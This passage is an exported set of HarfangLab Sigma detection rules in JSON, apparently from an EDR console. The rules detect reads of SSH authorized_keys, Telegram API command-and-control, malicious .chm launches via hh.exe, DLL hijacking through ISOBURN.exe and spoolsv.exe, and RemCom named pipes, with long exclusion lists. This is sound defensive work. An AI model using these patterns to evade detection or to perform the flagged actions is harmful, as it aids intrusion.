"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.641796Z",
"creation_date": "2026-03-23T11:45:34.596830Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596837Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1021/004/",
"https://attack.mitre.org/techniques/T1484/",
"https://attack.mitre.org/techniques/T1098/004/"
],
"name": "t1021_004_ssh_authorized_keys_read_linux.yml",
"content": "title: SSH Authorized Keys Read\nid: d5bec053-13ac-498d-8233-c20cac8072d1\ndescription: |\n Detects an attempt to read the content of ~/.ssh/authorized_keys.\n This file contains the list of SSH keys that are allowed to connect to that account.\n Reading this file can therefore be an attempt to discover new hosts or facilitate lateral movement.\n It is recommended to look for other malicious actions the ancestors processes may have taken.\nreferences:\n - https://attack.mitre.org/techniques/T1021/004/\n - https://attack.mitre.org/techniques/T1484/\n - https://attack.mitre.org/techniques/T1098/004/\ndate: 2022/11/18\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.004\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1484\n - attack.persistence\n - attack.t1098.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SensitiveInformation\n - classification.Linux.Behavior.Lateralization\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_path:\n - Path:\n - '/home/*/.ssh/authorized_keys'\n - '/home/*/.ssh/authorized_keys2'\n - '/root/.ssh/authorized_keys'\n - '/root/.ssh/authorized_keys2'\n ProcessImage|contains: '?'\n - TargetPath:\n - '/home/*/.ssh/authorized_keys'\n - '/home/*/.ssh/authorized_keys2'\n - '/root/.ssh/authorized_keys'\n - '/root/.ssh/authorized_keys2'\n ProcessImage|contains: '?'\n\n selection_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_ssh:\n - ProcessImage|endswith: '/ssh'\n - ProcessParentImage|endswith: '/ssh'\n\n exclusion_sshd:\n - ProcessImage|endswith: '/sshd'\n - ProcessParentImage|endswith: '/sshd'\n\n exclusion_scp:\n - ProcessImage|endswith: '/scp'\n - ProcessParentImage|endswith: '/scp'\n\n exclusion_ssh_keygen:\n - ProcessImage: '/usr/bin/ssh-keygen'\n\n exclusion_common:\n ProcessImage:\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/usr/bin/rsync'\n - '/bin/tar'\n - '/usr/bin/tar'\n - 
'/usr/bin/systemd-tmpfiles'\n - '/usr/bin/file'\n - '/usr/bin/caja'\n - '/usr/bin/rpm'\n\n exclusion_opt:\n ProcessImage:\n - '/opt/eset/*'\n - '/opt/ds_agent/*'\n - '/opt/McAfee/ens/tp/bin/mfetpd'\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n - '/opt/deepinstinct/bin/DeepManagementService'\n - '/opt/rudder/bin/cf-agent'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/opt/cybereason/sensor/bin/cbram'\n - '/opt/hpud/*/.discagnt/udscan'\n - '*/openv/netbackup/bin/bpbkar'\n - '/opt/sophos-av/engine/_/savscand.?'\n\n exclusion_yum:\n ProcessCommandLine:\n - '/usr/bin/python /bin/yum update'\n - '/usr/bin/python /bin/yum update -y'\n\n exclusion_puppetlabs:\n - ProcessImage|startswith: '/opt/puppetlabs/'\n - ProcessParentImage|startswith: '/opt/puppetlabs/'\n - ProcessCommandLine|startswith:\n - '/opt/puppetlabs/'\n - '/usr/bin/ruby /usr/bin/puppet agent '\n - ProcessAncestors|contains: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_clamscan:\n ProcessImage: '/usr/bin/clamscan'\n\n exclusion_mdatp:\n - ProcessParentImage: '/opt/microsoft/mdatp/sbin/wdavdaemon'\n - ProcessImage: '/opt/microsoft/mdatp/sbin/wdavdaemon'\n\n exclusion_zabbix:\n ProcessImage: '/usr/sbin/zabbix_agentd'\n\n exclusion_ureadahead:\n ProcessImage: '/sbin/ureadahead'\n\n exclusion_seahorse:\n ProcessImage: '/usr/bin/seahorse'\n\n exclusion_aide:\n ProcessImage|endswith: '/bin/aide'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_tina:\n ProcessCommandLine:\n - '/tina/atempodedupengine/default/bin/.exe.ade_server'\n - '/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - '/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n\n exclusion_bacula:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n\n exclusion_wazuh:\n ProcessImage: '/var/ossec/bin/wazuh-syscheckd'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_proxmox:\n ProcessImage:\n - '/usr/bin/proxmox-backup-client'\n - '/usr/local/sbin/proxmox-backup-client'\n\n exclusion_google_guest_agent:\n ProcessImage: '/usr/bin/google_guest_agent'\n\n exclusion_netwitness_logcollector:\n - 
ProcessCommandLine: '/bin/bash /etc/netwitness/ng/logcollector/lctwin'\n - ProcessParentCommandLine: '/bin/bash /etc/netwitness/ng/logcollector/lctwin'\n\n exclusion_tanium:\n ProcessAncestors|contains:\n - '/opt/tanium/taniumclient/taniumclient'\n - '/opt/tanium/taniumclient/taniumspawnhelper'\n - '/opt/tanium/taniumclient/taniumcx'\n\n exclusion_lacework_datacollector:\n # /var/lib/lacework/6.11.0.21858/datacollector\n # /var/lib/lacework/6.7.6.19823/datacollector\n ProcessImage: '/var/lib/lacework/*/datacollector'\n\n exclusion_cfagent:\n - ProcessAncestors|contains: '/usr/sbin/cfexecd'\n - ProcessImage: '/usr/sbin/cfagent'\n\n exclusion_hive_client:\n ProcessCommandLine|startswith:\n - '/usr/bin/python? /usr/local/bin/hive-client '\n - '/usr/bin/python?.? /usr/local/bin/hive-client '\n - '/usr/bin/python?.?? /usr/local/bin/hive-client '\n\n exclusion_nessus_scan:\n - ProcessParentCommandLine: 'sh -c printf \"command_start_%s\" \"*\"; *; printf \"command_done_%s\" \"*\"'\n - ProcessGrandparentCommandLine: 'sh -c printf \"command_start_%s\" \"*\"; *; printf \"command_done_%s\" \"*\"'\n\n exclusion_jumpcloud:\n ProcessAncestors|contains: '/opt/jc/bin/jumpcloud-agent'\n\n exclusion_oneautomation:\n ProcessAncestors|contains: '/oneautomation/*/smgr/bin/ucybsmgr|'\n\n exclusion_containerd:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_tripwire:\n ProcessImage: '/usr/sbin/tripwire'\n\n exclusion_gapplication_service:\n ProcessCommandLine|contains: '--gapplication-service'\n ProcessImage:\n - '/usr/bin/nautilus'\n - '/usr/bin/gedit'\n\n exclusion_cloudinit:\n ProcessCommandLine|startswith:\n - '/usr/bin/python? 
/usr/bin/cloud-init '\n - '/usr/libexec/platform-python /usr/bin/cloud-init '\n\n exclusion_salt:\n - ProcessCommandLine:\n - '/usr/bin/python* /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-call *'\n - '/usr/libexec/platform-python /usr/bin/salt-call *'\n - ProcessImage: '/opt/saltstack/salt/bin/python?.??'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d5bec053-13ac-498d-8233-c20cac8072d1",
"rule_name": "SSH Authorized Keys Read",
"rule_description": "Detects an attempt to read the content of ~/.ssh/authorized_keys.\nThis file lists the SSH public keys that are allowed to authenticate to that account; key comments often reveal the originating user and host.\nReading this file can therefore be an attempt to discover other hosts or accounts of interest, or to facilitate lateral movement.\nIt is recommended to look for other malicious actions the ancestor processes may have taken.\n",
"rule_creation_date": "2022-11-18",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1098.004",
"attack.t1484"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d5ec5548-f8e7-4ca3-ba05-1cd2c00b7965",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082769Z",
"creation_date": "2026-03-23T11:45:34.082771Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082775Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf",
"https://www.cloudsek.com/blog/breaking-into-the-bandit-stealer-malware-infrastructure",
"https://attack.mitre.org/techniques/T1102/002/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1102_002_url_request_telegram_api.yml",
"content": "title: URL Request to Telegram API\nid: d5ec5548-f8e7-4ca3-ba05-1cd2c00b7965\ndescription: |\n Detects URL requests to the Telegram API.\n Adversaries may use an existing, legitimate external Web service such as a Telegram bot as a means of sending commands to and receiving output from a compromised system over the Web service channel.\n It is recommended to investigate the process at the origin of the connection to determine whether it can legitimately communicate with the Telegram API.\nreferences:\n - https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf\n - https://www.cloudsek.com/blog/breaking-into-the-bandit-stealer-malware-infrastructure\n - https://attack.mitre.org/techniques/T1102/002/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/10/04\nmodified: 2025/04/29\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.t1071.001\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost: 'api.telegram.org'\n\n filter_telegram:\n ProcessSigned: 'true'\n ProcessSignature: 'Telegram FZ-LLC'\n\n exclusion_cisco:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\CiscoCollabHost.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d5ec5548-f8e7-4ca3-ba05-1cd2c00b7965",
"rule_name": "URL Request to Telegram API",
"rule_description": "Detects URL requests to the Telegram API.\nAdversaries may use an existing, legitimate external Web service such as a Telegram bot as a means of sending commands to and receiving output from a compromised system over the Web service channel.\nIt is recommended to investigate the process at the origin of the connection to determine whether it can legitimately communicate with the Telegram API.\n",
"rule_creation_date": "2023-10-04",
"rule_modified_date": "2025-04-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d5f9a231-a605-4a0f-826e-513f92e27d3c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619275Z",
"creation_date": "2026-03-23T11:45:34.619277Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619282Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/MBThreatIntel/status/1561736526819639298",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_001_suspicious_process_parent_hh.yml",
"content": "title: Suspicious Process Started by hh.exe\nid: d5f9a231-a605-4a0f-826e-513f92e27d3c\ndescription: |\n Detects the execution of a suspicious process launched by hh.exe that can be the result of clicking a malicious .chm file.\n This is often the result of a phishing attack. This technique has been used by threat actors in an August 2022 campaign to deliver an AgentTesla payload.\n It is recommended to analyze both the grandparent process and the .chm file itself to look for malicious content, and to investigate further malicious actions stemming from hh.exe.\nreferences:\n - https://twitter.com/MBThreatIntel/status/1561736526819639298\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2022/09/29\nmodified: 2025/03/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Hh\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\hh.exe'\n\n exclusion_hh:\n CommandLine: '?:\\Windows\\hh.exe'\n\n exclusion_werfault:\n Image:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n CommandLine|contains: ' -u -p '\n\n exclusion_splwow:\n CommandLine: '?:\\Windows\\splwow64.exe 8192'\n\n exclusion_browser:\n Image:\n - '?:\\Program Files*\\Microsoft\\Edge\\Application\\msedge.exe'\n - '?:\\Program Files*\\Mozilla Firefox\\firefox.exe'\n - '?:\\Program Files*\\Google\\Chrome\\Application\\chrome.exe'\n Signed: 'true'\n\n exclusion_adobe:\n Signature: 'Adobe Inc.'\n Signed: 'true'\n\n exclusion_spooler:\n Image: '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\\\*.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d5f9a231-a605-4a0f-826e-513f92e27d3c",
"rule_name": "Suspicious Process Started by hh.exe",
"rule_description": "Detects the execution of a suspicious process launched by hh.exe, which may be the result of opening a malicious .chm (Compiled HTML Help) file.\nThis is often the result of a phishing attack. This technique was used by threat actors in an August 2022 campaign to deliver an AgentTesla payload.\nIt is recommended to analyze both the grandparent process and the .chm file itself to look for malicious content, and to investigate any further malicious actions stemming from hh.exe.\n",
"rule_creation_date": "2022-09-29",
"rule_modified_date": "2025-03-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d64960e1-ea00-454e-88a5-c1b8c9cffc38",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078939Z",
"creation_date": "2026-03-23T11:45:34.078941Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078945Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_isoburn.yml",
"content": "title: DLL Hijacking via ISOBURN.exe\nid: d64960e1-ea00-454e-88a5-c1b8c9cffc38\ndescription: |\n Detects potential Windows DLL Hijacking via ISOBURN.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ISOBURN.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\uxtheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d64960e1-ea00-454e-88a5-c1b8c9cffc38",
"rule_name": "DLL Hijacking via ISOBURN.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ISOBURN.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate, signed executable to a directory they control and planting a malicious DLL with the expected name in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d6626a07-ebc3-45d0-a15c-029147b71685",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599099Z",
"creation_date": "2026-03-23T11:45:34.599102Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599110Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_spoolsv.yml",
"content": "title: DLL Hijacking via spoolsv.exe\nid: d6626a07-ebc3-45d0-a15c-029147b71685\ndescription: |\n Detects potential Windows DLL Hijacking via spoolsv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'spoolsv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\DNSAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d6626a07-ebc3-45d0-a15c-029147b71685",
"rule_name": "DLL Hijacking via spoolsv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via spoolsv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting a malicious DLL with the expected name in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d68bd5c7-1803-446c-9f61-a41bb1ba41f5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078981Z",
"creation_date": "2026-03-23T11:45:34.078984Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078990Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/19/b/monero-miner-malware-uses-radmin-mimikatz-to-infect-propagate-via-vulnerability.html",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_radmin_named_pipe_creation.yml",
"content": "title: RemCom Named Pipe Created\nid: d68bd5c7-1803-446c-9f61-a41bb1ba41f5\ndescription: |\n Detects the creation of a Named Pipe pertaining to RemCom.\n RemCom is a Remote Management tool; it was created with the goal of replacing psexec. It uses Named Pipes mainly to self-replicate through the network.\n It is recommended to determine if this tool is expected in your environment and to investigate any commands launched by RemCom.\nreferences:\n - https://www.trendmicro.com/en_us/research/19/b/monero-miner-malware-uses-radmin-mimikatz-to-infect-propagate-via-vulnerability.html\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - attack.t1072\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Tool.RemCom\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: named_pipe_creation\n product: windows\ndetection:\n selection:\n PipeName|endswith: '\\RemCom_communicaton'\n\n # Exclusion for ADSelfService Plus\n # https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-remcomsvc-exe-is-detected-as-a-threat\n exclusion_adselfservice:\n # ADSelfService Plus use two backslashes in the command line\n ProcessCommandLine: '?:\\Windows\\\\\\\\RemComSvc.exe'\n ProcessParentImage: '?:\\Windows\\system32\\services.exe'\n\n # exclusion from the client side\n exclusion_manageengine_client:\n # ..\\bin\\RemCom.exe \\\\YYYYYY /user:xxxx\\Manage_Engine_AD /pwd:* wmic logicaldisk list brief /format:\"%WINDIR%\\System32\\wbem\\en-us\\csv\"\n ProcessImage|endswith: '\\ManageEngine\\ADAudit Plus\\bin\\RemCom.exe'\n\n exclusion_manageengine_bundle:\n ProcessImage|endswith:\n - 'UEMS_CentralServer\\bin\\RemCom.exe'\n - '?:\\Windows\\SysWOW64\\RemComSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ZOHO Corporation Private Limited'\n\n condition: selection and not 
1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d68bd5c7-1803-446c-9f61-a41bb1ba41f5",
"rule_name": "RemCom Named Pipe Created",
"rule_description": "Detects the creation of a named pipe pertaining to RemCom.\nRemCom is a remote administration tool created as a replacement for PsExec. Like PsExec, it installs a service on the target host and communicates with it over a named pipe, which makes it a convenient lateral movement tool for attackers as well as administrators.\nIt is recommended to determine whether this tool is expected in your environment and to investigate any commands launched through RemCom.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
